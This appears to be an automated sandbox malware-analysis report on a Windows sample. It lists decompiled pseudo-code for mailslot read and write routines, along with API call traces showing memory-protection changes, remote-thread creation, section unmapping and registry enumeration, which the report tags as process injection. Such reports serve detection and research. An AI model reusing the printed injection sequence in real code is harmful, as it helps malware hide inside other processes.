  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B314CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
